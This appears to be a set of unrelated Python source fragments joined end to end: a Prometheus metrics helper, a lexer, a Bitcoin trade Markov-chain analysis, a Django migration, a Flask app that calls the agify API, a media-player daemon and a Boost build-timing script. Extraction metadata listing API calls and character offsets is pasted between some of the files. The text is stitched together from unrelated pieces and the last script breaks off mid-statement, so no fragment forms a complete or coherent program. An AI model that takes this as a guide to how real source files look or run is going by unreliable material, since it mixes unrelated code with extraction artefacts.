:param endpoint: The endpoint we are obtaining the data from
:param requested_metrics: A dict which is expected with the following
structure:
{
"metric": "optional" | any string
}
Where if the metric is set as "optional" an exception is not raised if that
metric is not found. Furthermore, this function will set the metric's value
to None if this is the case.
If the metric is not set as optional and it cannot be found at the data
source its value is set as None.
:param logger: Where logging should be sent
:param verify: Will verify the certificate if set to True
:return: The metrics with their values
"""
response = {}
if len(requested_metrics) == 0:
raise NoMetricsGivenException("No metrics given when requesting "
"prometheus data from " + endpoint)
metrics = get_prometheus(endpoint, logger, verify)
for family in text_string_to_metric_families(metrics):
for sample in family.samples:
if sample.name in requested_metrics:
if sample.name not in response:
if sample.labels != {}:
response[sample.name] = {}
response[sample.name][json.dumps(sample.labels)] = \
sample.value
else:
response[sample.name] = sample.value
else:
if sample.labels != {}:
response[sample.name][json.dumps(sample.labels)] = \
sample.value
else:
response[sample.name] = sample.value + \
response[sample.name]
missing_metrics = set(requested_metrics) - set(response)
for metric in missing_metrics:
if requested_metrics[metric].lower() == "optional":
response[metric] = None
else:
raise MetricNotFoundException(metric, endpoint)
return response
def transformed_data_processing_helper(component_name: str, configuration: Dict,
transformed_data: Dict,
*other_args) -> None:
"""
This function attempts to execute the appropriate processing function
on the transformed data based on a configuration. If the transformed
data is malformed, this function will raise an UnexpectedDataException
:param configuration: A dict with the following schema:
{
'<source_name>': {
'<data_index_Key>': <related_processing_fn>
}
}
:param transformed_data: The data received from the transformed
:param component_name: The name fo the component receiving the transformed
: data
:return: None
: Raises an UnexpectedDataException if the transformed_data is
malformed
"""
processing_performed = False
for source, processing_details in configuration.items():
# If the required source is not in the transformed data, then the
# transformed data is malformed, therefore raise an exception.
if source not in transformed_data:
raise ReceivedUnexpectedDataException(component_name)
# If the source is enabled, process its transformed data.
if transformed_data[source]:
# Check which index_key was passed by the transformer and
# execute the appropriate function.
sub_processing_performed = False
for data_index_key, processing_fn in processing_details.items():
if data_index_key in transformed_data[source]:
processing_fn(transformed_data[source][data_index_key],
*other_args)
processing_performed = True
sub_processing_performed = True
break
# If this is false, it means that no processing fn could be
# applied to the source's data
if not sub_processing_performed:
raise ReceivedUnexpectedDataException(component_name)
# If no processing is performed, it means that the data was not
# properly formatted, therefore raise an error.
if not processing_performed:
raise ReceivedUnexpectedDataException(component_name)
| [
"src.utils.exceptions.NoMetricsGivenException",
"prometheus_client.parser.text_string_to_metric_families",
"json.dumps",
"requests.get",
"src.utils.exceptions.ReceivedUnexpectedDataException",
"src.utils.exceptions.MetricNotFoundException"
] | [((570, 675), 'requests.get', 'requests.get', ([], {'url': 'endpoint', 'params': 'params', 'timeout': '(10)', 'verify': 'verify', 'headers': "{'Connection': 'close'}"}), "(url=endpoint, params=params, timeout=10, verify=verify,\n headers={'Connection': 'close'})\n", (582, 675), False, 'import requests\n'), ((2302, 2341), 'prometheus_client.parser.text_string_to_metric_families', 'text_string_to_metric_families', (['metrics'], {}), '(metrics)\n', (2332, 2341), False, 'from prometheus_client.parser import text_string_to_metric_families\n'), ((901, 987), 'requests.get', 'requests.get', (['endpoint'], {'timeout': '(10)', 'verify': 'verify', 'headers': "{'Connection': 'close'}"}), "(endpoint, timeout=10, verify=verify, headers={'Connection':\n 'close'})\n", (913, 987), False, 'import requests\n'), ((2094, 2191), 'src.utils.exceptions.NoMetricsGivenException', 'NoMetricsGivenException', (["('No metrics given when requesting prometheus data from ' + endpoint)"], {}), "(\n 'No metrics given when requesting prometheus data from ' + endpoint)\n", (2117, 2191), False, 'from src.utils.exceptions import NoMetricsGivenException, MetricNotFoundException, ReceivedUnexpectedDataException\n'), ((5820, 5867), 'src.utils.exceptions.ReceivedUnexpectedDataException', 'ReceivedUnexpectedDataException', (['component_name'], {}), '(component_name)\n', (5851, 5867), False, 'from src.utils.exceptions import NoMetricsGivenException, MetricNotFoundException, ReceivedUnexpectedDataException\n'), ((3348, 3389), 'src.utils.exceptions.MetricNotFoundException', 'MetricNotFoundException', (['metric', 'endpoint'], {}), '(metric, endpoint)\n', (3371, 3389), False, 'from src.utils.exceptions import NoMetricsGivenException, MetricNotFoundException, ReceivedUnexpectedDataException\n'), ((4716, 4763), 'src.utils.exceptions.ReceivedUnexpectedDataException', 'ReceivedUnexpectedDataException', (['component_name'], {}), '(component_name)\n', (4747, 4763), False, 'from src.utils.exceptions import NoMetricsGivenException, MetricNotFoundException, ReceivedUnexpectedDataException\n'), ((5604, 5651), 'src.utils.exceptions.ReceivedUnexpectedDataException', 'ReceivedUnexpectedDataException', (['component_name'], {}), '(component_name)\n', (5635, 5651), False, 'from src.utils.exceptions import NoMetricsGivenException, MetricNotFoundException, ReceivedUnexpectedDataException\n'), ((2619, 2644), 'json.dumps', 'json.dumps', (['sample.labels'], {}), '(sample.labels)\n', (2629, 2644), False, 'import json\n'), ((2890, 2915), 'json.dumps', 'json.dumps', (['sample.labels'], {}), '(sample.labels)\n', (2900, 2915), False, 'import json\n')] |
import re
from alr.input_streams import InputStream
from alr.instances import Terminal, Token, END_TERMINAL_NAME
class LexerException(Exception):
pass
class Lexer:
def next(self) -> Token:
pass
def findMatchInfo(terminals: [Terminal], data: str):
for terminal in terminals:
match = re.match(terminal.regexp, data)
if match:
return match, terminal
return None
def lexer(terminals: [Terminal], skip_terminals: [Terminal], input_stream: InputStream) -> Token:
source = input_stream.source
len_source = len(source)
while not input_stream.is_consumed:
data = input_stream.get()
match_info = findMatchInfo(skip_terminals, data)
if match_info:
match, _ = match_info
input_stream.consume(match.end())
continue
match_info = findMatchInfo(terminals, data)
if match_info:
match, terminal = match_info
end = match.end()
yield Token(terminal, input_stream.index, input_stream.index + end, source)
input_stream.consume(end)
continue
raise LexerException(f'pos: {input_stream.index}: Can not parse {data}')
endTerminal = Terminal(END_TERMINAL_NAME, len(terminals))
yield Token(endTerminal, len_source, len_source, source)
| [
"alr.instances.Token",
"re.match"
] | [((317, 348), 're.match', 're.match', (['terminal.regexp', 'data'], {}), '(terminal.regexp, data)\n', (325, 348), False, 'import re\n'), ((1281, 1331), 'alr.instances.Token', 'Token', (['endTerminal', 'len_source', 'len_source', 'source'], {}), '(endTerminal, len_source, len_source, source)\n', (1286, 1331), False, 'from alr.instances import Terminal, Token, END_TERMINAL_NAME\n'), ((999, 1068), 'alr.instances.Token', 'Token', (['terminal', 'input_stream.index', '(input_stream.index + end)', 'source'], {}), '(terminal, input_stream.index, input_stream.index + end, source)\n', (1004, 1068), False, 'from alr.instances import Terminal, Token, END_TERMINAL_NAME\n')] |
import sys
sys.path.append('../lib')
import exchange
import datetime
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from scipy.stats import norm
def transition_probabilities(chain, offset=1):
states = np.array([s for s in set(chain)])
state_space = {s: i for i, s in enumerate(states)}
transition_matrix = np.zeros((states.shape[0], states.shape[0]))
for i in states:
total_in_state = np.sum(chain == i) - np.sum(chain[-offset:] == i)
relevant_states = np.concatenate(([False] * offset, (chain == i)[:-offset]))
for j in states:
transition_matrix[state_space[i]][state_space[j]] = np.sum(chain[relevant_states] == j) / total_in_state
return transition_matrix, state_space
def main():
e = exchange.Exchange('../lib/binance.db')
times = [datetime.datetime(2018, 4, 1) + datetime.timedelta(days=i) for i in range(500)]
p_00 = []
p_11 = []
prices = []
for start, end in zip(times[:-1], times[1:]):
print(start)
it = e.get_orders('BTCUSDT', start.timestamp() * 1000, end.timestamp() * 1000)
trade_data = {'price': [], 'time': [], 'side': []}
for order in it:
trade_data['price'].append(order.end_price)
trade_data['time'].append(order.time)
trade_data['side'].append(order.buyer) #True if market order is a buy
trade_data = pd.DataFrame(trade_data)
trade_data['price_change'] = np.log(np.concatenate(([1], trade_data['price'].values[1:] / trade_data['price'].values[:-1])))
movement = np.zeros(trade_data.shape[0])
movement[trade_data['price_change'] > 0] = 1
movement[trade_data['price_change'] < 0] = -1
chain = movement[movement != 0]
P, states = transition_probabilities(chain)
try:
p_11.append(P[states[1]][states[1]])
p_00.append(P[states[-1]][states[-1]])
except:
pass
prices.append(np.mean(trade_data['price']))
#fig, ax1 = plt.subplots()
#ax2 = ax1.twinx()
#ax1.plot(prices, color='blue')
#ax2.plot(p_11, color='green', label='p_11')
#ax2.plot(p_00, color='red', label='p_00')
#ax2.legend()
#ax1.set_xlabel('Day')
#ax1.set_ylabel('BTC Price')
#ax2.set_ylabel('Probability')
plt.figure()
plt.hist(np.diff(p_00), 50, density=True)
loc, scale = norm.fit(np.diff(p_00))
x = np.linspace(np.min(np.diff(p_00)), np.max(np.diff(p_00)), 100)
plt.plot(x, norm.pdf(x, loc=loc, scale=scale))
plt.figure()
plt.hist(np.diff(p_11), 50, density=True)
x = np.linspace(np.min(np.diff(p_11)), np.max(np.diff(p_11)), 100)
loc, scale = norm.fit(np.diff(p_11))
plt.plot(x, norm.pdf(x, loc=loc, scale=scale))
plt.show()
if __name__ == '__main__':
main()
| [
"datetime.datetime",
"numpy.mean",
"numpy.diff",
"numpy.sum",
"numpy.zeros",
"matplotlib.pyplot.figure",
"exchange.Exchange",
"scipy.stats.norm.pdf",
"numpy.concatenate",
"pandas.DataFrame",
"datetime.timedelta",
"sys.path.append",
"matplotlib.pyplot.show"
] | [((11, 36), 'sys.path.append', 'sys.path.append', (['"""../lib"""'], {}), "('../lib')\n", (26, 36), False, 'import sys\n'), ((351, 395), 'numpy.zeros', 'np.zeros', (['(states.shape[0], states.shape[0])'], {}), '((states.shape[0], states.shape[0]))\n', (359, 395), True, 'import numpy as np\n'), ((789, 827), 'exchange.Exchange', 'exchange.Exchange', (['"""../lib/binance.db"""'], {}), "('../lib/binance.db')\n", (806, 827), False, 'import exchange\n'), ((2483, 2495), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (2493, 2495), True, 'import matplotlib.pyplot as plt\n'), ((2730, 2742), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (2740, 2742), True, 'import matplotlib.pyplot as plt\n'), ((2977, 2987), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2985, 2987), True, 'import matplotlib.pyplot as plt\n'), ((518, 576), 'numpy.concatenate', 'np.concatenate', (['([False] * offset, (chain == i)[:-offset])'], {}), '(([False] * offset, (chain == i)[:-offset]))\n', (532, 576), True, 'import numpy as np\n'), ((1476, 1500), 'pandas.DataFrame', 'pd.DataFrame', (['trade_data'], {}), '(trade_data)\n', (1488, 1500), True, 'import pandas as pd\n'), ((1663, 1692), 'numpy.zeros', 'np.zeros', (['trade_data.shape[0]'], {}), '(trade_data.shape[0])\n', (1671, 1692), True, 'import numpy as np\n'), ((2513, 2526), 'numpy.diff', 'np.diff', (['p_00'], {}), '(p_00)\n', (2520, 2526), True, 'import numpy as np\n'), ((2576, 2589), 'numpy.diff', 'np.diff', (['p_00'], {}), '(p_00)\n', (2583, 2589), True, 'import numpy as np\n'), ((2686, 2719), 'scipy.stats.norm.pdf', 'norm.pdf', (['x'], {'loc': 'loc', 'scale': 'scale'}), '(x, loc=loc, scale=scale)\n', (2694, 2719), False, 'from scipy.stats import norm\n'), ((2760, 2773), 'numpy.diff', 'np.diff', (['p_11'], {}), '(p_11)\n', (2767, 2773), True, 'import numpy as np\n'), ((2898, 2911), 'numpy.diff', 'np.diff', (['p_11'], {}), '(p_11)\n', (2905, 2911), True, 'import numpy as np\n'), ((2933, 2966), 'scipy.stats.norm.pdf', 'norm.pdf', (['x'], {'loc': 'loc', 'scale': 'scale'}), '(x, loc=loc, scale=scale)\n', (2941, 2966), False, 'from scipy.stats import norm\n'), ((442, 460), 'numpy.sum', 'np.sum', (['(chain == i)'], {}), '(chain == i)\n', (448, 460), True, 'import numpy as np\n'), ((463, 491), 'numpy.sum', 'np.sum', (['(chain[-offset:] == i)'], {}), '(chain[-offset:] == i)\n', (469, 491), True, 'import numpy as np\n'), ((846, 875), 'datetime.datetime', 'datetime.datetime', (['(2018)', '(4)', '(1)'], {}), '(2018, 4, 1)\n', (863, 875), False, 'import datetime\n'), ((878, 904), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': 'i'}), '(days=i)\n', (896, 904), False, 'import datetime\n'), ((1550, 1642), 'numpy.concatenate', 'np.concatenate', (["([1], trade_data['price'].values[1:] / trade_data['price'].values[:-1])"], {}), "(([1], trade_data['price'].values[1:] / trade_data['price'].\n values[:-1]))\n", (1564, 1642), True, 'import numpy as np\n'), ((2105, 2133), 'numpy.mean', 'np.mean', (["trade_data['price']"], {}), "(trade_data['price'])\n", (2112, 2133), True, 'import numpy as np\n'), ((2622, 2635), 'numpy.diff', 'np.diff', (['p_00'], {}), '(p_00)\n', (2629, 2635), True, 'import numpy as np\n'), ((2645, 2658), 'numpy.diff', 'np.diff', (['p_00'], {}), '(p_00)\n', (2652, 2658), True, 'import numpy as np\n'), ((2824, 2837), 'numpy.diff', 'np.diff', (['p_11'], {}), '(p_11)\n', (2831, 2837), True, 'import numpy as np\n'), ((2847, 2860), 'numpy.diff', 'np.diff', (['p_11'], {}), '(p_11)\n', (2854, 2860), True, 'import numpy as np\n'), ((666, 701), 'numpy.sum', 'np.sum', (['(chain[relevant_states] == j)'], {}), '(chain[relevant_states] == j)\n', (672, 701), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2020-05-13 23:41
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import smart_selects.db_fields
class Migration(migrations.Migration):
dependencies = [
('survey', '0007_auto_20200513_0150'),
]
operations = [
migrations.CreateModel(
name='MonitoringReporting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('reporting_date', models.DateField()),
('number', models.FloatField(blank=True, null=True)),
('source_text', models.CharField(blank=True, max_length=1500, null=True)),
('source_url', models.URLField(blank=True, max_length=1500, null=True)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='survey.ItemCategory')),
('item', smart_selects.db_fields.ChainedForeignKey(blank=True, chained_field='category', chained_model_field='category', null=True, on_delete=django.db.models.deletion.CASCADE, to='survey.Item')),
],
),
]
| [
"django.db.models.FloatField",
"django.db.models.DateField",
"django.db.models.ForeignKey",
"django.db.models.AutoField",
"django.db.models.URLField",
"django.db.models.CharField"
] | [((472, 565), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (488, 565), False, 'from django.db import migrations, models\n'), ((599, 617), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (615, 617), False, 'from django.db import migrations, models\n'), ((647, 687), 'django.db.models.FloatField', 'models.FloatField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (664, 687), False, 'from django.db import migrations, models\n'), ((722, 778), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(1500)', 'null': '(True)'}), '(blank=True, max_length=1500, null=True)\n', (738, 778), False, 'from django.db import migrations, models\n'), ((812, 867), 'django.db.models.URLField', 'models.URLField', ([], {'blank': '(True)', 'max_length': '(1500)', 'null': '(True)'}), '(blank=True, max_length=1500, null=True)\n', (827, 867), False, 'from django.db import migrations, models\n'), ((899, 1010), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""+"""', 'to': '"""survey.ItemCategory"""'}), "(on_delete=django.db.models.deletion.CASCADE, related_name\n ='+', to='survey.ItemCategory')\n", (916, 1010), False, 'from django.db import migrations, models\n')] |
#
# Miscellenous tools
#
from argparse import ArgumentParser
import inspect
from pprint import pprint
def parse_keyword_arguments(unparsed_args, class_object, debug=True):
"""
Take unparsed arguments and a class object,
check what keyword arguments class's __init__
takes, create ArgumentParser object for them
and parse them through. Return a dictionary
mapping keywords to the parsed arguments, and remaining
unparsed arguments.
NOTE: class_object should have attribute "REQUIRED_ARGUMENTS",
which is a list containing all keyword names that
are required. If keyword is not required, the default
value from __init__ definition will be used.
Returns tuple of (
dictionary mapping keyword names to parsed values,
remaining unparsed args
)
If debug is true, print out what arguments are being gathered.
"""
parser = ArgumentParser()
arguments = inspect.signature(class_object.__init__)
for argument in arguments.parameters.values():
if argument.default is not argument.empty:
parser.add_argument(
"--{}".format(argument.name),
type=type(argument.default),
default=argument.default,
required=argument.name in class_object.REQUIRED_ARGUMENTS
)
# Update unparsed args to detect duplicates of same variable name
class_arguments, unparsed_args = parser.parse_known_args(unparsed_args)
class_arguments = vars(class_arguments)
if debug:
print("\nArguments for {}".format(class_object.__name__))
pprint(class_arguments, indent=4, width=1)
# Coolio newline
print("")
return class_arguments, unparsed_args
| [
"inspect.signature",
"pprint.pprint",
"argparse.ArgumentParser"
] | [((913, 929), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (927, 929), False, 'from argparse import ArgumentParser\n'), ((946, 986), 'inspect.signature', 'inspect.signature', (['class_object.__init__'], {}), '(class_object.__init__)\n', (963, 986), False, 'import inspect\n'), ((1622, 1664), 'pprint.pprint', 'pprint', (['class_arguments'], {'indent': '(4)', 'width': '(1)'}), '(class_arguments, indent=4, width=1)\n', (1628, 1664), False, 'from pprint import pprint\n')] |
from omegaconf import OmegaConf
def default_detection_train_config():
# FIXME currently using args for train config, will revisit, perhaps move to Hydra
h = OmegaConf.create()
# dataset
h.skip_crowd_during_training = True
# augmentation
h.input_rand_hflip = True
h.train_scale_min = 0.1
h.train_scale_max = 2.0
h.autoaugment_policy = None
# optimization
h.momentum = 0.9
h.learning_rate = 0.08
h.lr_warmup_init = 0.008
h.lr_warmup_epoch = 1.0
h.first_lr_drop_epoch = 200.0
h.second_lr_drop_epoch = 250.0
h.clip_gradients_norm = 10.0
h.num_epochs = 300
# regularization l2 loss.
h.weight_decay = 4e-5
h.lr_decay_method = 'cosine'
h.moving_average_decay = 0.9998
h.ckpt_var_scope = None
return h
| [
"omegaconf.OmegaConf.create"
] | [((167, 185), 'omegaconf.OmegaConf.create', 'OmegaConf.create', ([], {}), '()\n', (183, 185), False, 'from omegaconf import OmegaConf\n')] |
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) 2015 <NAME> <<EMAIL>>
# License: MIT (see LICENSE file)
import apigen
class Ordering(apigen.Definition):
@apigen.command()
def first(self):
return "first"
@apigen.command()
def second(self):
return "second"
@apigen.command()
def third(self):
return "third"
@apigen.command()
def fourth(self):
return "fourth"
if __name__ == "__main__":
apigen.run(Ordering)
| [
"apigen.run",
"apigen.command"
] | [((169, 185), 'apigen.command', 'apigen.command', ([], {}), '()\n', (183, 185), False, 'import apigen\n'), ((236, 252), 'apigen.command', 'apigen.command', ([], {}), '()\n', (250, 252), False, 'import apigen\n'), ((305, 321), 'apigen.command', 'apigen.command', ([], {}), '()\n', (319, 321), False, 'import apigen\n'), ((372, 388), 'apigen.command', 'apigen.command', ([], {}), '()\n', (386, 388), False, 'import apigen\n'), ((468, 488), 'apigen.run', 'apigen.run', (['Ordering'], {}), '(Ordering)\n', (478, 488), False, 'import apigen\n')] |
from flask import Flask, request
from flask_sqlalchemy import SQLAlchemy
from ast import literal_eval
import requests
DB = SQLAlchemy()
class Record(DB.Model):
id = DB.Column(DB.BigInteger, primary_key=True, nullable=False)
name = DB.Column(DB.String, nullable=False)
age = DB.Column(DB.SmallInteger, nullable=False)
def __repr__(self):
return f'[Id: {self.id} | Name: {self.name} | Predicted Age: {self.age}]'
def create_app():
APP = Flask(__name__)
APP.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///agify_data.sqlite3'
DB.init_app(APP)
@APP.route('/')
def base():
all_records = Record.query.all()
return str(all_records)
@APP.route('/no_older_than_40')
def filter_age():
filtered_records = Record.query.filter(Record.age <= 40).all()
return str(filtered_records)
@APP.route('/check_name')
def check_name():
BASE_URL = 'https://api.agify.io?name='
name = request.args['name']
data = literal_eval(requests.get(BASE_URL + name).text)
if not Record.query.all():
last_id = -1
else:
last_id = DB.session.query(DB.func.max(Record.id)).first()[0]
try:
rec = Record(id=last_id+1, name=name, age=data['age'])
DB.session.add(rec)
DB.session.commit()
return f'Record added: {rec}'
except Exception as e:
return str(e)
@APP.route('/refresh')
def refresh():
DB.drop_all()
DB.create_all()
return 'Database Refreshed!'
return APP
if __name__ == '__main__':
create_app().run()
| [
"flask_sqlalchemy.SQLAlchemy",
"requests.get",
"flask.Flask"
] | [((125, 137), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', ([], {}), '()\n', (135, 137), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((471, 486), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (476, 486), False, 'from flask import Flask, request\n'), ((1025, 1054), 'requests.get', 'requests.get', (['(BASE_URL + name)'], {}), '(BASE_URL + name)\n', (1037, 1054), False, 'import requests\n')] |
"""
A daemon to make controlling multiple players easier.
Daemon core, contains the glib event loop
"""
import logging
from functools import partial
import gi
gi.require_version('Playerctl', '2.0')
from gi.repository import Playerctl, GLib
from .utils import get_player_instance, is_player_active
logger = logging.getLogger('core')
PLAYER_SIGNALS = (
'loop-status', 'metadata', 'seeked', 'shuffle', 'volume'
)
class Core:
def __init__(self, publish_event_callback):
self.current_player_index = 0
self.current_player = None
self.signal_handlers = []
self.player_manager = None
self.publish_event_callback = publish_event_callback
def set_current_player(self, player):
prev_player = self.current_player
if player is None:
logger.debug('Unsetting current player')
self.current_player_index = 0
self.current_player = None
else:
self.current_player_index = self.player_manager.props.players.index(player)
self.current_player = player
logger.debug(f'Current player set to [{self.current_player_index}] = {get_player_instance(self.current_player)}')
if self.current_player != prev_player:
# Disconnect old handlers and connect to new player
if prev_player:
for handler_id in self.signal_handlers:
prev_player.disconnect(handler_id)
self.signal_handlers = []
if self.current_player:
for signal_name in PLAYER_SIGNALS:
handler_id = self.current_player.connect(
signal_name,
partial(self.on_current_player_signal, signal_name)
)
self.signal_handlers.append(handler_id)
self.publish_event_callback(
'ctl_player_change',
instance=get_player_instance(self.current_player)
)
def move_current_player_index(self, amount):
players = self.player_manager.props.players
if not players:
return None
new_index = (self.current_player_index + amount) % len(players)
self.set_current_player(players[new_index])
return get_player_instance(self.current_player)
def find_first_active_player(self):
return next(
(
player
for player in self.player_manager.props.players
if is_player_active(player)
),
None
)
def player_init(self, name):
player = Playerctl.Player.new_from_name(name)
player.connect('playback-status', self.on_playback_state_change)
self.player_manager.manage_player(player)
def on_current_player_signal(self, event, player, *args):
# Unpack GVariants so we can send them over RPC
args = list(args)
for i, v in enumerate(args):
if hasattr(v, 'unpack'):
args[i] = v.unpack()
self.publish_event_callback(event, data=args)
def on_playback_state_change(self, player, state):
if player == self.current_player:
self.publish_event_callback('playback-status', data=[state.value_nick])
if is_player_active(self.current_player):
return
if state == Playerctl.PlaybackStatus.PLAYING:
self.set_current_player(player)
return
active_player = self.find_first_active_player()
if player == self.current_player and active_player:
self.set_current_player(active_player)
def on_player_appeared(self, manager, player):
logger.debug(f'Player added: {get_player_instance(player)}')
players = self.player_manager.props.players
# Switch to new player if it's active
active_player = self.find_first_active_player()
if self.current_player is None:
self.set_current_player(active_player or players[0])
return
if not is_player_active(self.current_player) and active_player:
self.set_current_player(active_player)
return
self.set_current_player(self.current_player)
def on_player_vanished(self, manager, player):
logger.debug(f'Player vanished: {get_player_instance(player)}')
players = self.player_manager.props.players
if player != self.current_player:
self.set_current_player(self.current_player)
return
logger.debug('Current player has vanished')
if not players:
self.set_current_player(None)
return
next_player = players[min(self.current_player_index, len(players) - 1)]
self.set_current_player(self.find_first_active_player() or next_player)
def on_name_appeared(self, manager, name):
self.player_init(name)
def run(self):
self.player_manager = Playerctl.PlayerManager()
self.player_manager.connect('name-appeared', self.on_name_appeared)
self.player_manager.connect('player-appeared', self.on_player_appeared)
self.player_manager.connect('player-vanished', self.on_player_vanished)
for name in self.player_manager.props.player_names:
self.player_init(name)
GLib.MainLoop().run() | [
"logging.getLogger",
"gi.repository.GLib.MainLoop",
"gi.require_version",
"functools.partial",
"gi.repository.Playerctl.Player.new_from_name",
"gi.repository.Playerctl.PlayerManager"
] | [((162, 200), 'gi.require_version', 'gi.require_version', (['"""Playerctl"""', '"""2.0"""'], {}), "('Playerctl', '2.0')\n", (180, 200), False, 'import gi\n'), ((311, 336), 'logging.getLogger', 'logging.getLogger', (['"""core"""'], {}), "('core')\n", (328, 336), False, 'import logging\n'), ((2627, 2663), 'gi.repository.Playerctl.Player.new_from_name', 'Playerctl.Player.new_from_name', (['name'], {}), '(name)\n', (2657, 2663), False, 'from gi.repository import Playerctl, GLib\n'), ((4949, 4974), 'gi.repository.Playerctl.PlayerManager', 'Playerctl.PlayerManager', ([], {}), '()\n', (4972, 4974), False, 'from gi.repository import Playerctl, GLib\n'), ((5316, 5331), 'gi.repository.GLib.MainLoop', 'GLib.MainLoop', ([], {}), '()\n', (5329, 5331), False, 'from gi.repository import Playerctl, GLib\n'), ((1704, 1755), 'functools.partial', 'partial', (['self.on_current_player_signal', 'signal_name'], {}), '(self.on_current_player_signal, signal_name)\n', (1711, 1755), False, 'from functools import partial\n')] |
from dataclasses import dataclass, field
from enum import Enum
from typing import Optional, Union
class FooTypeValue(Enum):
WA = "WA"
OR = "OR"
CA = "CA"
@dataclass
class FooTest:
class Meta:
name = "fooTest"
value: Optional[Union[int, FooTypeValue]] = field(
default=None,
metadata={
"min_inclusive": 100,
"max_inclusive": 200,
}
)
@dataclass
class Root:
class Meta:
name = "root"
foo_test: Optional[Union[int, FooTypeValue]] = field(
default=None,
metadata={
"name": "fooTest",
"type": "Element",
"required": True,
"min_inclusive": 100,
"max_inclusive": 200,
}
)
| [
"dataclasses.field"
] | [((286, 360), 'dataclasses.field', 'field', ([], {'default': 'None', 'metadata': "{'min_inclusive': 100, 'max_inclusive': 200}"}), "(default=None, metadata={'min_inclusive': 100, 'max_inclusive': 200})\n", (291, 360), False, 'from dataclasses import dataclass, field\n'), ((533, 667), 'dataclasses.field', 'field', ([], {'default': 'None', 'metadata': "{'name': 'fooTest', 'type': 'Element', 'required': True, 'min_inclusive': \n 100, 'max_inclusive': 200}"}), "(default=None, metadata={'name': 'fooTest', 'type': 'Element',\n 'required': True, 'min_inclusive': 100, 'max_inclusive': 200})\n", (538, 667), False, 'from dataclasses import dataclass, field\n')] |
from django.urls import path
from rest_framework_simplejwt.views import TokenRefreshView
from .views import registration, log_in
urlpatterns = [
path('register/', registration, name='register'),
path('log_in/', log_in, name='log_in'),
path('refresh/', TokenRefreshView.as_view(), name='token_refresh'),
]
| [
"django.urls.path",
"rest_framework_simplejwt.views.TokenRefreshView.as_view"
] | [((150, 198), 'django.urls.path', 'path', (['"""register/"""', 'registration'], {'name': '"""register"""'}), "('register/', registration, name='register')\n", (154, 198), False, 'from django.urls import path\n'), ((204, 242), 'django.urls.path', 'path', (['"""log_in/"""', 'log_in'], {'name': '"""log_in"""'}), "('log_in/', log_in, name='log_in')\n", (208, 242), False, 'from django.urls import path\n'), ((265, 291), 'rest_framework_simplejwt.views.TokenRefreshView.as_view', 'TokenRefreshView.as_view', ([], {}), '()\n', (289, 291), False, 'from rest_framework_simplejwt.views import TokenRefreshView\n')] |
#!/usr/bin/python3
# Calculate boost.afio build times under various configs
# (C) 2015 <NAME>
# Created: 12th March 2015
#[ [`--link-test --fast-build debug`][][[footnote ASIO has a link error without `link=static`]][fails]]
#[ [`--link-test debug`][][][]]
#[ [`--link-test --lto debug`][[]][][]]
#[ [`--link-test pch=off debug`][][][]]
#[[`--link-test --fast-build release`][][[footnote ASIO has a link error without `link=static`]][fails]]
#[ [`--link-test release`][][][]]
#[ [`--link-test --lto release`][][][]]
import os, sys, subprocess, time, shutil, platform
if len(sys.argv)<2:
print("Usage: "+sys.argv[0]+" <toolset>", file=sys.stderr)
sys.exit(1)
if not os.path.exists("b2") and not os.path.exists("b2.exe"):
print("ERROR: Need to run me from boost root directory please", file=sys.stderr)
print(os.getcwd())
shutil.rmtree("bin.v2", True)
onWindows="Windows" in platform.system()
configs=[
["--c++14 --link-test --fast-build debug", None],
["--c++14 --link-test debug", None],
["--c++14 --link-test --lto debug", None],
["--c++14 --link-test pch=off debug", None],
["--c++14 --link-test --fast-build release", None],
["--c++14 --link-test release", None],
["--c++14 --link-test --lto release", None],
["standalone_singleabi", None],
["standalone_multiabi", None]
]
for config in configs:
print("\n\nConfig: "+config[0])
if config[0]=="standalone_singleabi" or config[0]=="standalone_multiabi":
if onWindows:
test_all="test_all.exe"
tocall="alltests_msvc.bat" if "msvc" in sys.argv[1] else "alltests_gcc.bat"
else:
test_all="test_all"
tocall="alltests_gcc.sh"
if config[0]=="standalone_singleabi":
tocall="standalone_"+tocall
else:
tocall="multiabi_"+tocall
basedir=os.getcwd()
env=dict(os.environ)
if not onWindows:
tocall="./"+tocall
env['CXX']=sys.argv[1]
env['CXX']=env['CXX'].replace('gcc', 'g++')
env['CXX']=env['CXX'].replace('clang', 'clang++')
try:
os.chdir("libs/afio")
shutil.rmtree(test_all, True)
if subprocess.call(tocall, env=env, shell=True):
config[1]="FAILED"
continue
shutil.rmtree(test_all, True)
print("\n\nStarting benchmark ...")
begin=time.perf_counter()
subprocess.call(tocall, env=env, shell=True)
end=time.perf_counter()
finally:
os.chdir(basedir)
else:
shutil.rmtree("bin.v2/libs/afio", True)
if subprocess.call([os.path.abspath("b2"), "toolset="+sys.argv[1], "libs/afio/test", "-j", "8"]+config[0].split(" ")):
config[1]="FAILED"
continue
shutil.rmtree("bin.v2/libs/afio", True)
print("\n\nStarting benchmark ...")
begin=time.perf_counter()
subprocess.call([os.path.abspath("b2"), "toolset="+sys.argv[1], "libs/afio/test"]+config[0].split(" "))
end=time.perf_counter()
mins=int((end-begin)/60)
secs=int((end-begin)%60);
